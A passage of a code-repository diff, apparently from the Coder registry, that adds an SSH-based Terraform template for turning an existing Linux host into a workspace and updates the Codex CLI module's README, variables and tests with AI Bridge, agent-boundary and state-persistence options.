+  )
 }
 
 data "coder_provisioner" "me" {}
@@ -187,7 +201,7 @@ data "coder_parameter" "home_volume_size" {
 
 resource "coder_agent" "main" {
   os   = "linux"
-  arch = "amd64"
+  arch = local.agent_arch
 
   metadata {
     key          = "cpu"

registry/IamTaoChen/README.md

@@ -0,0 +1,16 @@
+---
+display_name: "Tao Chen"
+bio: "I believe in the power of technology to simplify life. Currently a freelancer, working on ideas that matter."
+github: "IamTaoChen"
+avatar: "./.images/avatar.png"
+support_email: "IamTaoChen@gmail.com"
+status: "community"
+---
+
+# Tao Chen
+
+## Template
+
+### ssh-linux
+
+Provision an existing Linux system as a workspace by deploying the Coder agent via SSH with this example template.

registry/IamTaoChen/templates/ssh-linux/README.md

@@ -0,0 +1,58 @@
+---
+display_name: Deploy Coder on existing Linux System
+description: Provision an existing Linux system as a workspace by deploying the Coder agent via SSH with this example template.
+icon: "../../../../.icons/linux.svg"
+verified: false
+tags: ["linux"]
+---
+
+# Deploy Coder on existing Linux system
+
+Provision an existing Linux system as a [Coder workspace](https://coder.com/docs/workspaces) by deploying the Coder agent via SSH with this example template.
+
+## Prerequisites
+
+### Authentication
+
+This template assumes you have SSH access to the target Linux system. You can use either password-based authentication or an SSH private key. Ensure the target system allows SSH connections and has basic utilities like `bash` installed. The user account specified must have sufficient permissions to execute scripts and manage processes in their home directory.
+
+For more details on SSH setup, consult your Linux distribution's documentation or standard SSH guides.
+
+## Architecture
+
+This template deploys the following:
+
+- A Coder agent configured for Linux (amd64 architecture).
+- Conditional parameters for SSH authentication (password or key).
+- A selection of applications (e.g., VS Code Desktop, VS Code Web, Cursor) that can be enabled via multi-select.
+- `null_resource` blocks to handle workspace start/stop:
+  - On start: Connects via SSH, creates a cache directory, writes and executes the agent's init script in the background, and logs the process ID.
+  - On stop: Connects via SSH, kills the agent process if running, and removes the cache directory.
+- Optional modules for additional apps like `coder-login`, `cursor`, and `vscode-web`, which are provisioned only if selected and when the workspace starts.
+
+This setup does not provision new infrastructure; it remotely deploys and manages the Coder agent on your existing Linux host. Files and configurations in the user's home directory persist across restarts, but the agent is stopped and cleaned up on workspace stop.
+
+### Persistent Agent
+
+The agent is ephemeral by design (started on workspace start, stopped on stop). If you need a persistently running agent, modify the template to remove the stop logic or run the agent manually on the host.
+
+## Security Considerations
+
+Warning: This template stores SSH credentials (password or private key) in the Terraform state file and passes them as environment variables during deployment. In production environments, this can introduce security risks, as the state file contains sensitive information in plain text and may be accessible if not properly secured.
+
+## Usage
+
+1. Create a new workspace in Coder using this template.
+2. Fill in the parameters with your Linux system's details.
+3. Start the workspace—Coder will connect via SSH and deploy the agent.
+4. Access the workspace through the Coder dashboard. Selected apps (e.g., VS Code) will be available.
+5. On stop, the agent process is terminated and cleaned up.
+
+## Troubleshooting
+
+- **SSH Connection Issues**: Verify the host, port, username, and credentials. Check firewall rules and SSH server status on the target system. Review the debug log at `~/.coder/<workspace_id>/debug.log` on the remote host.
+- **Agent Not Starting**: Inspect the log file at `~/.coder/<workspace_id>/coder.log` on the remote host for errors.
+- **App Not Appearing**: Ensure the app is selected in parameters and the workspace is restarted if changes are made.
+- **Validation Errors**: Parameters like host and port have built-in validations—ensure inputs match the requirements.
+
+For more advanced customization, refer to the [Coder Terraform provider documentation](https://registry.terraform.io/providers/coder/coder/latest/docs).

registry/IamTaoChen/templates/ssh-linux/main.tf

@@ -0,0 +1,319 @@
+terraform {
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.4.0"
+    }
+    random = {
+      source  = "hashicorp/random"
+      version = ">= 3.6"
+    }
+  }
+}
+
+provider "coder" {}
+data "coder_workspace" "me" {}
+data "coder_workspace_owner" "me" {}
+
+
+data "coder_parameter" "host" {
+  description  = "Remote Host or IP"
+  display_name = "Host"
+  name         = "host"
+  type         = "string"
+  default      = "192.168.1.1"
+  mutable      = false
+  order        = 1
+  validation {
+    regex = "^[a-zA-Z0-9:.%\\-]+$"
+    error = "Please enter a valid hostname, IPv4, or IPv6 address. Examples: example.com, 192.168.1.1, or fe80::1"
+  }
+}
+
+data "coder_parameter" "username" {
+  default      = data.coder_workspace_owner.me.name
+  description  = "SSH Username"
+  display_name = "Username"
+  name         = "username"
+  mutable      = false
+  order        = 2
+}
+
+data "coder_parameter" "auth_type" {
+  name         = "auth_type"
+  display_name = "SSH Auth Type"
+  description  = "Authentication method for SSH"
+  type         = "string"
+
+  form_type = "dropdown"
+  default   = "password"
+  mutable   = true
+  order     = 3
+  option {
+    name  = "password"
+    value = "password"
+  }
+
+  option {
+    name  = "SSH Key Manual"
+    value = "ssh_key"
+  }
+
+  option {
+    name  = "SSH Key from Coder"
+    value = "ssh_key_coder"
+  }
+
+}
+
+data "coder_parameter" "ssh_password" {
+  count        = data.coder_parameter.auth_type.value == "password" ? 1 : 0
+  name         = "ssh_password"
+  display_name = "SSH Password"
+  description  = "Password for SSH login"
+  type         = "string"
+  mutable      = true
+  styling = jsonencode({
+    mask_input = true
+  })
+  order = 4
+}
+
+data "coder_parameter" "ssh_key" {
+  count        = data.coder_parameter.auth_type.value == "ssh_key" ? 1 : 0
+  name         = "ssh_key"
+  display_name = "SSH Private Key"
+  description  = "Paste SSH private key"
+  type         = "string"
+  mutable      = true
+  form_type    = "textarea"
+  styling = jsonencode({
+    mask_input = true
+  })
+  order = 4
+}
+
+data "coder_parameter" "ssh_key_coder" {
+  count        = data.coder_parameter.auth_type.value == "ssh_key_coder" ? 1 : 0
+  name         = "ssh_key_coder"
+  display_name = "Public Key From Coder"
+  description  = "Add this public key to your remote server's authorized_keys: \n\n${data.coder_workspace_owner.me.ssh_public_key}"
+  default      = "********************"
+  styling = jsonencode({
+    disabled   = true
+    mask_input = true
+  })
+  order = 4
+}
+
+
+data "coder_parameter" "port" {
+  default      = 22
+  description  = "SSH Port"
+  display_name = "Port"
+  name         = "port"
+  type         = "number"
+  mutable      = true
+  order        = 5
+  validation {
+    min   = 1
+    max   = 65535
+    error = "Port must be between 1 and 65535"
+  }
+}
+
+data "coder_parameter" "apps" {
+  name         = "apps"
+  display_name = "Choose any APPs for your workspace."
+  type         = "list(string)"
+  form_type    = "multi-select"
+  mutable      = true
+  default      = jsonencode(["VS Code Desktop"])
+  dynamic "option" {
+    for_each = local.apps_candidate
+    content {
+      name  = option.value
+      value = option.value
+    }
+  }
+}
+
+locals {
+  username        = data.coder_parameter.username.value
+  home_dir        = "/home/${lower(local.username)}"
+  coder_cache_dir = "${local.home_dir}/.coder/${data.coder_workspace.me.id}"
+  agent_id_file   = "${local.coder_cache_dir}/agent.id"
+  use_password    = data.coder_parameter.auth_type.value == "password"
+  use_key         = contains(["ssh_key", "ssh_key_coder"], data.coder_parameter.auth_type.value)
+  ssh_password    = local.use_password ? data.coder_parameter.ssh_password[0].value : null
+  ssh_private_key = data.coder_parameter.auth_type.value == "ssh_key_coder" ? data.coder_workspace_owner.me.ssh_private_key : (length(data.coder_parameter.ssh_key) > 0 ? data.coder_parameter.ssh_key[0].value : null)
+  apps_candidate  = ["VS Code Desktop", "VS Code Web", "Cursor"]
+  apps_selected   = (can(data.coder_parameter.apps.value) && data.coder_parameter.apps.value != "") ? jsondecode(data.coder_parameter.apps.value) : []
+}
+
+resource "random_integer" "vs_code_port" {
+  min = 54000
+  max = 55999
+}
+
+resource "coder_agent" "main" {
+  os   = "linux"
+  arch = "amd64"
+
+  startup_script = <<-EOT
+    #!/bin/bash
+    set -euo pipefail
+  EOT
+
+  env = {
+    GIT_AUTHOR_NAME     = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
+    GIT_AUTHOR_EMAIL    = "${data.coder_workspace_owner.me.email}"
+    GIT_COMMITTER_NAME  = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
+    GIT_COMMITTER_EMAIL = "${data.coder_workspace_owner.me.email}"
+  }
+
+  display_apps {
+    port_forwarding_helper = true
+    vscode                 = contains(local.apps_selected, "VS Code Desktop")
+    vscode_insiders        = false
+    web_terminal           = true
+    ssh_helper             = true
+  }
+
+  metadata {
+    key          = "cpu"
+    display_name = "CPU Usage"
+    interval     = 5
+    timeout      = 5
+    script       = "coder stat cpu"
+  }
+  metadata {
+    key          = "memory"
+    display_name = "Memory Usage"
+    interval     = 5
+    timeout      = 5
+    script       = "coder stat mem"
+  }
+  metadata {
+    key          = "disk"
+    display_name = "Home Disk Usage"
+    interval     = 600
+    timeout      = 30
+    script       = "coder stat disk --path ${lower(local.home_dir)}"
+  }
+}
+
+resource "null_resource" "deploy_coder_agent" {
+  count = data.coder_workspace.me.start_count
+
+  triggers = {
+    init_script = sha256(coder_agent.main.init_script)
+    token       = coder_agent.main.token
+  }
+
+  connection {
+    type        = "ssh"
+    host        = data.coder_parameter.host.value
+    user        = data.coder_parameter.username.value
+    port        = data.coder_parameter.port.value
+    password    = local.ssh_password
+    private_key = local.ssh_private_key
+    timeout     = "5m"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "mkdir -p ${local.coder_cache_dir}",
+      "coder_sh=${local.coder_cache_dir}/coder.sh",
+      "log_file=${local.coder_cache_dir}/coder.log",
+      "cat > $coder_sh << 'EOF'",
+      "${coder_agent.main.init_script}",
+      "EOF",
+      "chmod +x $coder_sh",
+      "echo \"$(date) : create $coder_sh\" >> ${local.coder_cache_dir}/debug.log",
+      "nohup env CODER_AGENT_TOKEN='${coder_agent.main.token}' $coder_sh > $log_file 2>&1 &",
+      "echo $! > ${local.agent_id_file}",
+      "echo \"$(date) : run $coder_sh and log at $log_file\" >> ${local.coder_cache_dir}/debug.log",
+    ]
+  }
+}
+
+resource "null_resource" "coder_stop" {
+  count = (try(data.coder_workspace.me.start_count, 1) > 0 ? 0 : 1)
+
+  connection {
+    type        = "ssh"
+    host        = data.coder_parameter.host.value
+    user        = data.coder_parameter.username.value
+    port        = data.coder_parameter.port.value
+    password    = local.ssh_password
+    private_key = local.ssh_private_key
+    timeout     = "5m"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "set -u",
+      "PID_FILE=${local.agent_id_file}",
+      # Only proceed if PID file exists
+      "if [ -f \"$PID_FILE\" ]; then",
+      "  PID=$(cat \"$PID_FILE\")",
+      #   Check if it's actually a number and process exists
+      "  if [ -n \"$PID\" ] && echo \"$PID\" | grep -q '^[0-9][0-9]*$' && kill -0 \"$PID\" 2>/dev/null; then",
+      "    echo \"Gracefully stopping process $PID...\"",
+      #    First try graceful termination
+      "    kill -TERM \"$PID\" 2>/dev/null || true",
+      #     Wait and check repeatedly (up to ~15 seconds total)
+      "    for i in $(seq 1 15); do",
+      "      sleep 1",
+      "      if ! kill -0 \"$PID\" 2>/dev/null; then",
+      "        echo \"Process $PID terminated gracefully\"",
+      "        break",
+      "      fi",
+      #      Show we're still waiting (every 5 seconds)
+      "      expr $i % 5 = 0 >/dev/null && echo \"Still waiting... ($i/15 seconds)\"",
+      "    done",
+      #     Final check - only kill -9 if still alive"
+      "    if kill -0 \"$PID\" 2>/dev/null; then",
+      "      echo \"Process $PID did not terminate in time - sending SIGKILL\"",
+      "      kill -KILL \"$PID\" 2>/dev/null || true",
+      "    fi",
+      "  else",
+      "    echo \"No running process found for PID $PID (or invalid PID)\"",
+      "  fi",
+      "  ",
+      #  Clean lean up regardless of whether kill succeeded
+      "  rm -f \"$PID_FILE\"",
+      "  rm -rf ${local.coder_cache_dir} 2>/dev/null || true",
+      "else",
+      "  echo \"PID file not found: $PID_FILE - nothing to clean up\"",
+      "fi",
+      "sync 2>/dev/null || true",
+    ]
+  }
+}
+
+
+module "coder-login" {
+  count    = data.coder_workspace.me.start_count
+  source   = "registry.coder.com/coder/coder-login/coder"
+  version  = "1.1.1"
+  agent_id = coder_agent.main.id
+}
+
+module "cursor" {
+  count    = contains(local.apps_selected, "Cursor") ? data.coder_workspace.me.start_count : 0
+  source   = "registry.coder.com/coder/cursor/coder"
+  version  = "1.4.0"
+  agent_id = coder_agent.main.id
+}
+
+module "vscode-web" {
+  count          = contains(local.apps_selected, "VS Code Web") ? data.coder_workspace.me.start_count : 0
+  source         = "registry.coder.com/coder/vscode-web/coder"
+  version        = "1.4.3"
+  agent_id       = coder_agent.main.id
+  folder         = local.home_dir
+  port           = random_integer.vs_code_port.result
+  accept_license = true
+}

registry/coder-labs/modules/codex/README.md

@@ -3,7 +3,7 @@ display_name: Codex CLI
 icon: ../../../../.icons/openai.svg
 description: Run Codex CLI in your workspace with AgentAPI integration
 verified: true
-tags: [agent, codex, ai, openai, tasks]
+tags: [agent, codex, ai, openai, tasks, aibridge]
 ---
 
 # Codex CLI
@@ -13,7 +13,7 @@ Run Codex CLI in your workspace to access OpenAI's models through the Codex inte
 ```tf
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.0.0"
+  version        = "4.3.1"
   agent_id       = coder_agent.example.id
   openai_api_key = var.openai_api_key
   workdir        = "/home/coder/project"
@@ -32,7 +32,7 @@ module "codex" {
 module "codex" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.0.0"
+  version        = "4.3.1"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   workdir        = "/home/coder/project"
@@ -40,7 +40,44 @@ module "codex" {
 }
 ```
 
-### Tasks integration
+### Usage with AI Bridge
+
+[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`. Requires Coder version 2.30+
+
+For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage with Tasks](#usage-with-tasks) example below.
+
+#### Standalone usage with AI Bridge
+
+```tf
+module "codex" {
+  source          = "registry.coder.com/coder-labs/codex/coder"
+  version         = "4.3.1"
+  agent_id        = coder_agent.example.id
+  workdir         = "/home/coder/project"
+  enable_aibridge = true
+}
+```
+
+When `enable_aibridge = true`, the module:
+
+- Configures Codex to use the aibridge model_provider with `base_url` pointing to `${data.coder_workspace.me.access_url}/api/v2/aibridge/openai/v1` and `env_key` pointing to the workspace owner's session token
+
+```toml
+model_provider = "aibridge"
+
+[model_providers.aibridge]
+name = "AI Bridge"
+base_url = "https://example.coder.com/api/v2/aibridge/openai/v1"
+env_key = "CODER_AIBRIDGE_SESSION_TOKEN"
+wire_api = "responses"
+```
+
+This allows Codex to route API requests through Coder's AI Bridge instead of directly to OpenAI's API.
+Template build will fail if `openai_api_key` is provided alongside `enable_aibridge = true`.
+
+### Usage with Tasks
+
+This example shows how to configure Codex with Coder tasks.
 
 ```tf
 resource "coder_ai_task" "task" {
@@ -52,55 +89,51 @@ data "coder_task" "me" {}
 
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.0.0"
+  version        = "4.3.1"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   ai_prompt      = data.coder_task.me.prompt
   workdir        = "/home/coder/project"
 
-  # Custom configuration for full auto mode
-  base_config_toml = <<-EOT
-    approval_policy = "never"
-    preferred_auth_method = "apikey"
-  EOT
+  # Optional: route through AI Bridge (Premium feature)
+  # enable_aibridge = true
 }
 ```
 
-> [!WARNING]
-> This module configures Codex with a `workspace-write` sandbox that allows AI tasks to read/write files in the specified workdir. While the sandbox provides security boundaries, Codex can still modify files within the workspace. Use this module _only_ in trusted environments and be aware of the security implications.
+### Usage with Agent Boundaries
 
-## How it Works
+This example shows how to configure the Codex module to run the agent behind a process-level boundary that restricts its network access.
 
-- **Install**: The module installs Codex CLI and sets up the environment
-- **System Prompt**: If `codex_system_prompt` is set, writes the prompt to `AGENTS.md` in the `~/.codex/` directory
-- **Start**: Launches Codex CLI in the specified directory, wrapped by AgentAPI
-- **Configuration**: Sets `OPENAI_API_KEY` environment variable and passes `--model` flag to Codex CLI (if variables provided)
-- **Session Continuity**: When `continue = true` (default), the module automatically tracks task sessions in `~/.codex-module/.codex-task-session`. On workspace restart, it resumes the existing session with full conversation history. Set `continue = false` to always start fresh sessions.
-
-## Configuration
-
-### Default Configuration
-
-When no custom `base_config_toml` is provided, the module uses these secure defaults:
-
-```toml
-sandbox_mode = "workspace-write"
-approval_policy = "never"
-preferred_auth_method = "apikey"
-
-[sandbox_workspace_write]
-network_access = true
-```
-
-### Custom Configuration
-
-For custom Codex configuration, use `base_config_toml` and/or `additional_mcp_servers`:
+By default, when `enable_boundary = true`, the module uses `coder boundary` subcommand (provided by Coder) without requiring any installation.
 
 ```tf
 module "codex" {
-  source  = "registry.coder.com/coder-labs/codex/coder"
-  version = "4.0.0"
-  # ... other variables ...
+  source          = "registry.coder.com/coder-labs/codex/coder"
+  version         = "4.3.1"
+  agent_id        = coder_agent.main.id
+  openai_api_key  = var.openai_api_key
+  workdir         = "/home/coder/project"
+  enable_boundary = true
+}
+```
+
+> [!NOTE]
+> For developers: The module also supports installing boundary from a release version (`use_boundary_directly = true`) or compiling from source (`compile_boundary_from_source = true`). These are escape hatches for development and testing purposes.
+
+### Advanced Configuration
+
+This example shows additional configuration options for custom models, MCP servers, and base configuration.
+
+```tf
+module "codex" {
+  source         = "registry.coder.com/coder-labs/codex/coder"
+  version        = "4.3.1"
+  agent_id       = coder_agent.example.id
+  openai_api_key = "..."
+  workdir        = "/home/coder/project"
+
+  codex_version = "0.1.0"  # Pin to a specific version
+  codex_model   = "gpt-4o" # Custom model
 
   # Override default configuration
   base_config_toml = <<-EOT
@@ -119,6 +152,45 @@ module "codex" {
 }
 ```
 
+> [!WARNING]
+> This module configures Codex with a `workspace-write` sandbox that allows AI tasks to read/write files in the specified workdir. While the sandbox provides security boundaries, Codex can still modify files within the workspace. Use this module _only_ in trusted environments and be aware of the security implications.
+
+## How it Works
+
+- **Install**: The module installs Codex CLI and sets up the environment
+- **System Prompt**: If `codex_system_prompt` is set, writes the prompt to `AGENTS.md` in the `~/.codex/` directory
+- **Start**: Launches Codex CLI in the specified directory, wrapped by AgentAPI
+- **Configuration**: Sets `OPENAI_API_KEY` environment variable and passes `--model` flag to Codex CLI (if variables provided)
+- **Session Continuity**: When `continue = true` (default), the module automatically tracks task sessions in `~/.codex-module/.codex-task-session`. On workspace restart, it resumes the existing session with full conversation history. Set `continue = false` to always start fresh sessions.
+
+## State Persistence
+
+AgentAPI can save and restore its conversation state to disk across workspace restarts. This complements `continue` (which resumes the Codex CLI session) by also preserving the AgentAPI-level context. Enabled by default, requires agentapi >= v0.12.0 (older versions skip it with a warning).
+
+To disable:
+
+```tf
+module "codex" {
+  # ... other config
+  enable_state_persistence = false
+}
+```
+
+## Configuration
+
+### Default Configuration
+
+When no custom `base_config_toml` is provided, the module uses these secure defaults:
+
+```toml
+sandbox_mode = "workspace-write"
+approval_policy = "never"
+preferred_auth_method = "apikey"
+
+[sandbox_workspace_write]
+network_access = true
+```
+
 > [!NOTE]
 > If no custom configuration is provided, the module uses secure defaults. The Coder MCP server is always included automatically. For containerized workspaces (Docker/Kubernetes), you may need `sandbox_mode = "danger-full-access"` to avoid permission issues. For advanced options, see [Codex config docs](https://github.com/openai/codex/blob/main/codex-rs/config.md).
 
@@ -137,3 +209,4 @@ module "codex" {
 - [Codex CLI Documentation](https://github.com/openai/codex)
 - [AgentAPI Documentation](https://github.com/coder/agentapi)
 - [Coder AI Agents Guide](https://coder.com/docs/tutorials/ai-agents)
+- [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge)

registry/coder-labs/modules/codex/main.test.ts

@@ -113,7 +113,7 @@ describe("codex", async () => {
       sandbox_mode = "danger-full-access"
       approval_policy = "never"
       preferred_auth_method = "apikey"
-      
+
       [custom_section]
       new_feature = true
     `.trim();
@@ -189,7 +189,7 @@ describe("codex", async () => {
       args = ["-y", "@modelcontextprotocol/server-github"]
       type = "stdio"
       description = "GitHub integration"
-      
+
       [mcp_servers.FileSystem]
       command = "npx"
       args = ["-y", "@modelcontextprotocol/server-filesystem", "/workspace"]
@@ -215,7 +215,7 @@ describe("codex", async () => {
       approval_policy = "untrusted"
       preferred_auth_method = "chatgpt"
       custom_setting = "test-value"
-      
+
       [advanced_settings]
       timeout = 30000
       debug = true
@@ -228,7 +228,7 @@ describe("codex", async () => {
       args = ["--serve", "--port", "8080"]
       type = "stdio"
       description = "Custom development tool"
-      
+
       [mcp_servers.DatabaseMCP]
       command = "python"
       args = ["-m", "database_mcp_server"]
@@ -454,4 +454,63 @@ describe("codex", async () => {
     );
     expect(startLog.stdout).not.toContain("test prompt");
   });
+
+  test("codex-with-aibridge", async () => {
+    const { id } = await setup({
+      moduleVariables: {
+        enable_aibridge: "true",
+        model_reasoning_effort: "none",
+      },
+    });
+
+    await execModuleScript(id);
+    const configToml = await readFileContainer(
+      id,
+      "/home/coder/.codex/config.toml",
+    );
+    expect(configToml).toContain('model_provider = "aibridge"');
+  });
+
+  test("boundary-enabled", async () => {
+    const { id } = await setup({
+      moduleVariables: {
+        enable_boundary: "true",
+        boundary_config_path: "/tmp/test-boundary.yaml",
+      },
+    });
+    // Write boundary config
+    await execContainer(id, [
+      "bash",
+      "-c",
+      `cat > /tmp/test-boundary.yaml <<'EOF'
+jail_type: landjail
+proxy_port: 8087
+log_level: warn
+allowlist:
+  - "domain=api.openai.com"
+EOF`,
+    ]);
+    // Add mock coder binary for boundary setup
+    await writeExecutable({
+      containerId: id,
+      filePath: "/usr/bin/coder",
+      content: `#!/bin/bash
+if [ "$1" = "boundary" ]; then
+  if [ "$2" = "--help" ]; then
+    echo "boundary help"
+    exit 0
+  fi
+  shift; shift; exec "$@"
+fi
+echo "mock coder"`,
+    });
+    await execModuleScript(id);
+    await expectAgentAPIStarted(id);
+    // Verify boundary wrapper was used in start script
+    const startLog = await readFileContainer(
+      id,
+      "/home/coder/.codex-module/agentapi-start.log",
+    );
+    expect(startLog).toContain("boundary");
+  });
 });

registry/coder-labs/modules/codex/main.tf

@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.0"
+  required_version = ">= 1.9"
 
   required_providers {
     coder = {
@@ -71,6 +71,27 @@ variable "cli_app_display_name" {
   default     = "Codex CLI"
 }
 
+variable "enable_aibridge" {
+  type        = bool
+  description = "Use AI Bridge for Codex. https://coder.com/docs/ai-coder/ai-bridge"
+  default     = false
+
+  validation {
+    condition     = !(var.enable_aibridge && length(var.openai_api_key) > 0)
+    error_message = "openai_api_key cannot be provided when enable_aibridge is true. AI Bridge automatically authenticates the client using Coder credentials."
+  }
+}
+
+variable "model_reasoning_effort" {
+  type        = string
+  description = "The reasoning effort for the model. One of: none, low, medium, high. https://platform.openai.com/docs/guides/latest-model#lower-reasoning-effort"
+  default     = ""
+  validation {
+    condition     = contains(["", "none", "minimal", "low", "medium", "high", "xhigh"], var.model_reasoning_effort)
+    error_message = "model_reasoning_effort must be one of: none, low, medium, high."
+  }
+}
+
 variable "install_codex" {
   type        = bool
   description = "Whether to install Codex."
@@ -110,13 +131,13 @@ variable "install_agentapi" {
 variable "agentapi_version" {
   type        = string
   description = "The version of AgentAPI to install."
-  default     = "v0.11.6"
+  default     = "v0.12.1"
 }
 
 variable "codex_model" {
   type        = string
-  description = "The model for Codex to use. Defaults to gpt-5.1-codex-max."
-  default     = ""
+  description = "The model for Codex to use. Defaults to gpt-5.3-codex."
+  default     = "gpt-5.4"
 }
 
 variable "pre_install_script" {
@@ -143,47 +164,105 @@ variable "continue" {
   default     = true
 }
 
+variable "enable_state_persistence" {
+  type        = bool
+  description = "Enable AgentAPI conversation state persistence across restarts."
+  default     = true
+}
+
 variable "codex_system_prompt" {
   type        = string
   description = "System instructions written to AGENTS.md in the ~/.codex directory"
   default     = "You are a helpful coding assistant. Start every response with `Codex says:`"
 }
 
+variable "enable_boundary" {
+  type        = bool
+  description = "Enable coder boundary for network filtering."
+  default     = false
+}
+
+variable "boundary_config_path" {
+  type        = string
+  description = "Path to boundary config.yaml inside the workspace. If provided, exposed as BOUNDARY_CONFIG env var."
+  default     = ""
+}
+
+variable "boundary_version" {
+  type        = string
+  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release."
+  default     = "latest"
+}
+
+variable "compile_boundary_from_source" {
+  type        = bool
+  description = "Whether to compile boundary from source instead of using the official install script."
+  default     = false
+}
+
+variable "use_boundary_directly" {
+  type        = bool
+  description = "Whether to use boundary binary directly instead of coder boundary subcommand."
+  default     = false
+}
+
 resource "coder_env" "openai_api_key" {
   agent_id = var.agent_id
   name     = "OPENAI_API_KEY"
   value    = var.openai_api_key
 }
 
+resource "coder_env" "coder_aibridge_session_token" {
+  count    = var.enable_aibridge ? 1 : 0
+  agent_id = var.agent_id
+  name     = "CODER_AIBRIDGE_SESSION_TOKEN"
+  value    = data.coder_workspace_owner.me.session_token
+}
+
 locals {
-  workdir         = trimsuffix(var.workdir, "/")
-  app_slug        = "codex"
-  install_script  = file("${path.module}/scripts/install.sh")
-  start_script    = file("${path.module}/scripts/start.sh")
-  module_dir_name = ".codex-module"
+  workdir            = trimsuffix(var.workdir, "/")
+  app_slug           = "codex"
+  install_script     = file("${path.module}/scripts/install.sh")
+  start_script       = file("${path.module}/scripts/start.sh")
+  module_dir_name    = ".codex-module"
+  latest_codex_model = "gpt-5.4"
+  aibridge_config    = <<-EOF
+  [model_providers.aibridge]
+  name = "AI Bridge"
+  base_url = "${data.coder_workspace.me.access_url}/api/v2/aibridge/openai/v1"
+  env_key = "CODER_AIBRIDGE_SESSION_TOKEN"
+  wire_api = "responses"
+
+  EOF
 }
 
 module "agentapi" {
   source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.0.0"
+  version = "2.3.0"
 
-  agent_id             = var.agent_id
-  folder               = local.workdir
-  web_app_slug         = local.app_slug
-  web_app_order        = var.order
-  web_app_group        = var.group
-  web_app_icon         = var.icon
-  web_app_display_name = var.web_app_display_name
-  cli_app              = var.cli_app
-  cli_app_slug         = var.cli_app ? "${local.app_slug}-cli" : null
-  cli_app_display_name = var.cli_app ? var.cli_app_display_name : null
-  module_dir_name      = local.module_dir_name
-  install_agentapi     = var.install_agentapi
-  agentapi_subdomain   = var.subdomain
-  agentapi_version     = var.agentapi_version
-  pre_install_script   = var.pre_install_script
-  post_install_script  = var.post_install_script
-  start_script         = <<-EOT
+  agent_id                     = var.agent_id
+  folder                       = local.workdir
+  web_app_slug                 = local.app_slug
+  web_app_order                = var.order
+  web_app_group                = var.group
+  web_app_icon                 = var.icon
+  web_app_display_name         = var.web_app_display_name
+  cli_app                      = var.cli_app
+  cli_app_slug                 = var.cli_app ? "${local.app_slug}-cli" : null
+  cli_app_display_name         = var.cli_app ? var.cli_app_display_name : null
+  module_dir_name              = local.module_dir_name
+  install_agentapi             = var.install_agentapi
+  agentapi_subdomain           = var.subdomain
+  agentapi_version             = var.agentapi_version
+  enable_state_persistence     = var.enable_state_persistence
+  pre_install_script           = var.pre_install_script
+  post_install_script          = var.post_install_script
+  enable_boundary              = var.enable_boundary
+  boundary_config_path         = var.boundary_config_path
+  boundary_version             = var.boundary_version
+  compile_boundary_from_source = var.compile_boundary_from_source
+  use_boundary_directly        = var.use_boundary_directly
+  start_script                 = <<-EOT
      #!/bin/bash
      set -o errexit
      set -o pipefail
@@ -196,6 +275,7 @@ module "agentapi" {
      ARG_CODEX_START_DIRECTORY='${local.workdir}' \
      ARG_CODEX_TASK_PROMPT='${base64encode(var.ai_prompt)}' \
      ARG_CONTINUE='${var.continue}' \
+     ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
      /tmp/start.sh
    EOT
 
@@ -208,12 +288,17 @@ module "agentapi" {
     chmod +x /tmp/install.sh
     ARG_OPENAI_API_KEY='${var.openai_api_key}' \
     ARG_REPORT_TASKS='${var.report_tasks}' \
+    ARG_CODEX_MODEL='${var.codex_model}' \
+    ARG_LATEST_CODEX_MODEL='${local.latest_codex_model}' \
     ARG_INSTALL='${var.install_codex}' \
     ARG_CODEX_VERSION='${var.codex_version}' \
     ARG_BASE_CONFIG_TOML='${base64encode(var.base_config_toml)}' \
+    ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
+    ARG_AIBRIDGE_CONFIG='${base64encode(var.enable_aibridge ? local.aibridge_config : "")}' \
     ARG_ADDITIONAL_MCP_SERVERS='${base64encode(var.additional_mcp_servers)}' \
     ARG_CODER_MCP_APP_STATUS_SLUG='${local.app_slug}' \
     ARG_CODEX_START_DIRECTORY='${local.workdir}' \
+    ARG_MODEL_REASONING_EFFORT='${var.model_reasoning_effort}' \
     ARG_CODEX_INSTRUCTION_PROMPT='${base64encode(var.codex_system_prompt)}' \
     /tmp/install.sh
   EOT

registry/coder-labs/modules/codex/main.tftest.hcl

@@ -0,0 +1,187 @@
+run "test_codex_basic" {
+  command = plan
+
+  variables {
+    agent_id       = "test-agent"
+    workdir        = "/home/coder"
+    openai_api_key = "test-key"
+  }
+
+  assert {
+    condition     = var.agent_id == "test-agent"
+    error_message = "Agent ID should be set correctly"
+  }
+
+  assert {
+    condition     = var.workdir == "/home/coder"
+    error_message = "Workdir should be set correctly"
+  }
+
+  assert {
+    condition     = var.install_codex == true
+    error_message = "install_codex should default to true"
+  }
+
+  assert {
+    condition     = var.install_agentapi == true
+    error_message = "install_agentapi should default to true"
+  }
+
+  assert {
+    condition     = var.report_tasks == true
+    error_message = "report_tasks should default to true"
+  }
+
+  assert {
+    condition     = var.continue == true
+    error_message = "continue should default to true"
+  }
+}
+
+run "test_enable_state_persistence_default" {
+  command = plan
+
+  variables {
+    agent_id       = "test-agent"
+    workdir        = "/home/coder"
+    openai_api_key = "test-key"
+  }
+
+  assert {
+    condition     = var.enable_state_persistence == true
+    error_message = "enable_state_persistence should default to true"
+  }
+}
+
+run "test_disable_state_persistence" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent"
+    workdir                  = "/home/coder"
